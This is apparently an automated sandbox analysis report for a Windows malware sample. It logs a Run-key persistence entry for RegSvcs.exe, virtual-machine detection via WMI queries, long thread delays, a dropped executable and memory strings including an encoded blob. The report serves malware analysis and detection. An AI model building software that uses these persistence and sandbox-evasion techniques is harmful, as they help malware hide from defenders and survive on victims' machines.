Boot Survival

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run RegSvcs

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run RegSvcs			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run RegSvcs			Jump to behavior

Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Source: C:\Users\user\Desktop\1JCAVkYU3U.exe

Evasive API call chain: GetLocalTime,DecisionNodes

graph_0-23528

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Window / User API: threadDelayed 6292

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\re.exe

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\1JCAVkYU3U.exe

API call chain: ExitProcess graph end node

graph_0-23679

Source: 1JCAVkYU3U.exe, 00000000.00000002.273694562.00000000055D2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\~
Source: Amcache.hve.5.dr	Binary or memory string: VMware
Source: Amcache.hve.5.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: VMware-42 35 34 13 2a 07 0a 9c-ee 7f dd c3 60 c7 b9 af
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000330A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 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
Source: Amcache.hve.5.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.5.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: RegSvcs.exe, 00000006.00000002.531533948.0000000001547000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.531533948.00000000014FA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: RegSvcs.exe, 00000003.00000002.511484755.00000000063BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_VideoController(Standard display types)VMware386LS29GWin32_VideoController8AOXYGANVideoController120060621000000.000000-0000897.562display.infMSBDAVKNUZGS_PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colors3V7O_2Y3
Source: Amcache.hve.5.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr	Binary or memory string: VMware, Inc.me
Source: RegSvcs.exe, 00000006.00000002.531533948.0000000001547000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-USn
Source: Amcache.hve.5.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.18227214.B64.2106252220,BiosReleaseDate:06/25/2021,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: RegSvcs.exe, 00000003.00000002.486164662.000000000163B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.5.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Source: C:\Users\user\Desktop\1JCAVkYU3U.exe

Code function: 0_2_00B7E6A3 VirtualQuery,GetSystemInfo,

0_2_00B7E6A3

Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Code function: 0_2_00B6A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_00B6A69B
Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Code function: 0_2_00B7C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_00B7C220
